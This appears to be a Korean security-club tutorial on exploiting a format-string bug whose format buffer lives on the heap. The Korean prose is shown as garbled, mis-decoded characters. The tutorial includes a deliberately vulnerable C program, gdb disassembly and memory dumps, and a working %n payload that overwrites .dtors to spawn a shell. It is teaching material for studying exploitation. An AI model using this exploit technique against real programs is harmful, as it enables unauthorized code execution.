Èü¿µ¿ª¿¡¼­ÀÇ FSB °íÂû 1 passket@argos.or.kr http://www.argos.or.kr ----------------------------------------------------------------------------------------- Èü¿µ¿ª¿¡¼­ fsb°¡ ¹®Á¦ÀΰÍÀº Èü¿µ¿ªÀº 0x08ÀÇ ¸Þ¸ð¸®·Î ½ÃÀÛÇϴµ¥ printfÀÇ stack Æ÷ÀÎÅÍ´Â 0xbf·Î ½ÃÀÛÇÏ´Â °÷ºÎÅÍ 0xc0·Î ½ÃÀÛÇÏ´Â °÷À¸·Î °£´Ù´Â °ÍÀÌ´Ù. ÀÌ·¯´Ï Èü¿µ¿ª¿¡¼­ fsb°¡ ¹ß»ýÇÏ¸é ¾î¿ ¼ö ¾ø´Ù. ÇÏÁö¸¸ ÇÁ·Î±×·¥³»¿¡ stack ¸Þ¸ð¸®°¡ ÀÖ´Ù¸é »ç¿ëÇÒ ¼ö ÀÖ´Ù. ´ÙÀ½Àº Ãë¾àÇÑ ÄÚµåÀÌ´Ù. [passket@home test]$ cat test.c #include #include #include int main( ) { char *heap_buf; char stack_buf[32]; heap_buf = (char *)malloc( sizeof( char ) * 20 ); scanf( "%s", heap_buf ); scanf( "%s", stack_buf ); printf( heap_buf ); printf( "\n" ); return 0; } [passket@home test]$ ./test %x%x%x%x asdfeieieie bffff0c040015bd44001638066647361 [passket@home test]$ º¸´Ù½ÃÇÇ fsbÃë¾àÁ¡ÀÌ ÀÖ°í ¸Þ¸ð¸®´Â Èü¿µ¿ª¿¡ ÀÖ´Ù ¿ì¸®´Â stack¿µ¿ª¿¡ ÀÖ´Â ¸Þ¸ð¸® stack_buf°¡ ÀÖÀ¸¹Ç·Î ±×¾È¿¡ ÁÖ¼Ò¸¦ ³ÖÀºµÚ¿¡ printfÀÇ ½ºÅÃÆ÷ÀÎÅÍ°¡ ±×°÷À» °¡¸£Å°°Ô ÇÏ¿© ¿øÇÏ´Â °á°ú¸¦ ¾òÀ» ¼ö ÀÖ´Ù. ÀÏ´Ü gdb¸¦ ÅëÇؼ­ ÇÊ¿äÇÑ Á¤º¸¸¦ ¾ò¾îº¸ÀÚ. [passket@home test]$ gdb ./test GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) disass main Dump of assembler code for function main: 0x08048390 : push %ebp 0x08048391 : mov %esp,%ebp 0x08048393 : sub $0x38,%esp 0x08048396 : and $0xfffffff0,%esp 0x08048399 : mov $0x0,%eax 0x0804839e : sub %eax,%esp 0x080483a0 : sub $0xc,%esp 0x080483a3 : push $0x14 0x080483a5 : call 0x80482a0 0x080483aa : add $0x10,%esp 0x080483ad : mov %eax,0xfffffff4(%ebp) 0x080483b0 : sub $0x8,%esp 0x080483b3 : pushl 0xfffffff4(%ebp) 0x080483b6 : push $0x80484a8 0x080483bb : call 0x80482b0 0x080483c0 : add $0x10,%esp 0x080483c3 : sub $0x8,%esp 0x080483c6 : lea 0xffffffc8(%ebp),%eax 0x080483c9 : push %eax 0x080483ca : push $0x80484a8 0x080483cf : call 0x80482b0 0x080483d4 : add $0x10,%esp 0x080483d7 : sub $0xc,%esp 0x080483da : pushl 0xfffffff4(%ebp) 0x080483dd : call 0x80482d0 0x080483e2 : add $0x10,%esp 0x080483e5 : sub $0xc,%esp 0x080483e8 : push $0x80484ab 0x080483ed : call 0x80482d0 0x080483f2 : add $0x10,%esp 0x080483f5 : mov $0x0,%eax 0x080483fa : leave 0x080483fb : ret End of assembler dump. (gdb) b *main+77 (gdb) r Starting program: /home/ar_01/passket/sources/test/test AAAA AAAA Breakpoint 1, 0x080483dd in main () (gdb) x/100x $ebp-100 0xbffff704: 0x080484a8 0xbffff724 0x00000000 0x420601e0 0xbffff714: 0x42130a14 0xbffff768 0x080483d4 0x08049610 0xbffff724: 0xbffff730 0x40015bd4 0x40016380 0x41414141 0xbffff734: 0x00000000 0x42015481 0x0804830e 0x42130ef8 0xbffff744: 0x42130a14 0xbffff758 0x0804828d 0x42130a14 0xbffff754: 0x4000c660 0xbffff768 0x08049610 0x42130a14 0xbffff764: 0x40015360 0xbffff788 0x42015574 0x00000001 0xbffff774: 0xbffff7b4 0xbffff7bc 0x4001582c 0x00000001 0xbffff784: 0x080482e0 0x00000000 0x08048301 0x08048390 0xbffff794: 0x00000001 0xbffff7b4 0x080483fc 0x0804842c 0xbffff7a4: 0x4000c660 0xbffff7ac 0x00000000 0x00000001 0xbffff7b4: 0xbffffc1c 0x00000000 0xbffffc42 0xbffffc5c 0xbffff7c4: 0xbffffc6c 0xbffffc77 0xbffffc85 0xbffffc95 0xbffff7d4: 0xbffffcb8 0xbffffccb 0xbffffcd8 0xbffffe9b 0xbffff7e4: 0xbffffefa 0xbfffff17 0xbfffff23 0xbfffff48 0xbffff7f4: 0xbfffff5d 0xbfffff6e 0xbfffff87 0xbfffff8f 0xbffff804: 0xbfffff9f 0xbfffffc1 0x00000000 0x00000020 0xbffff814: 0xffffe000 0x00000010 0x0183f9ff 0x00000006 0xbffff824: 0x00001000 0x00000011 0x00000064 0x00000003 0xbffff834: 0x08048034 0x00000004 0x00000020 0x00000005 0xbffff844: 0x00000006 0x00000007 0x40000000 0x00000008 0xbffff854: 0x00000000 0x00000009 0x080482e0 0x0000000b 0xbffff864: 0x000001f4 0x0000000c 0x000001f4 0x0000000d 0xbffff874: 0x000001f4 0x0000000e 0x000001f4 0x0000000f 0xbffff884: 0xbffffc17 0x00000000 0x00000000 0x00000000 [passket@home test]$ ./test %9x%9x%9x%9x%9x AAAA bffff040 40015bd4 40016380 41414141 0 [passket@home test]$ ã¾Æº¸¸é printfÀÇ ½ºÅÃÆ÷ÀÎÅÍ°¡ ¾îµð¼­ ºÎÅÍ Áõ°¡Çϸ鼭 ¸Þ¸ð¸®¸¦ »Ì¾ÆÁÖ´ÂÁö ãÀ» ¼ö ÀÖ´Ù. À§ÀÇ ´ýÇÁ°á°ú·Î È®ÀÎÇϸé printfÀÇ ½ºÅÃÆ÷ÀÎÅÍ´Â 0xbffff724ºÎÅÍ 4¾¿ Áõ°¡ÇÑ´Ù. ±×¸®°í stack_bufÀÇ ½ÃÀÛÁÖ¼Ò´Â 0xbffff730 ºÎÅÍÀÌ´Ù µû¶ó¼­ %x¸¦ 3°³ ÀÔ·ÂÇѵڿ¡ printfÀÇ ½ºÅÃÆ÷ÀÎÅÍ´Â stack_bufÀÇ ½ÃÀÛ ÁÖ¼Ò¸¦ °¡¸£Å°°í ÀÖ´Ù. ÀÌÁ¦ °ø°ÝÇغ¸ÀÚ [passket@home test]$ ./test %9x%9x%9x%9x AAAA bfffe840 40015bd4 40016380 41414141 [passket@home test]$ Á¤È®È÷ stack_buf¿¡ ÀÔ·ÂÇÑ ¹®ÀÚ¿­À» ã¾Ò´Ù. ÀÌÁ¦ °ø°Ý¸¸ ³²¾Ò´Ù. stack_buf ¿¡ °ªÀ» ¹Ù²Ü ¸Þ¸ð¸®ÀÇ ÁÖ¼Ò¸¦ ³Ö¾îÁÖ°í heap_buf¿¡ Æ÷¸Ë½ºÆ®¸µÀ» ³Ö¾î ¿øÇÏ´Â ¸Þ¸ð¸®ÀÇ °ªÀ» º¯Á¶ÇÒ ¼ö ÀÖ´Ù. [passket@home test]$ ./egg Using address: 0xbfffddc8 sh-2.05b$ ./env 0xbffff2f3 sh-2.05b$ objdump -h ./test | grep .dtors 18 .dtors 00000008 08049590 08049590 00000590 2**2 sh-2.05b$ ( printf "%%8x%%8x%%8x%%62171c%%n%%52492c%%n\nAAAA\x94\x95\x04\x08AAAA\x96\x95\x04\x08" ; cat ) | ./test (Áß·«) ps PID TTY TIME CMD 8338 pts/2 00:00:02 bash 8651 pts/2 00:00:00 egg 8652 pts/2 00:00:01 sh 8656 pts/2 00:00:00 sh 8657 pts/2 00:00:00 sh 8658 pts/2 00:00:00 cat 8659 pts/2 00:00:00 ps exit sh-2.05b$ ½±°Ô ½©À» ¾òÀ» ¼ö ÀÖ´Ù. ±×¿Ü¿¡ ȯ°æº¯¼ö³ª argv¸¦ ÀÌ¿ëÇÏ´Â ¹æ¹ýÀ» »ý°¢ÇØ º¼¼ö ÀÖÀ¸³ª ¿äÁò ÇÁ·Î±×·¥Àº ·£´ýÇÑ À§Ä¡¿¡¼­ ½ºÅÃÀÌ ½ÃÀÛÇϱ⠶§¹®¿¡ °°Àº ½©»ó¿¡¼­´Â ½ÇÇàÇÒ¶§¸¶´Ù À§Ä¡°¡ °°Àº ȯ°æº¯¼ö³ª argv¿Í printfÀÇ ½ºÅÃÆ÷ÀÎÅÍÀÇ Â÷ÀÌ°¡ ¸Å¹ø ´Þ¶óÁö±â ¶§¹®¿¡ ÀÌ¿ëÇϱ⠾î·Æ´Ù. ±×¿ÜÀÇ ¹æ¹ýÀ» »ý°¢ÇغÁ¾ß°Ú´Ù.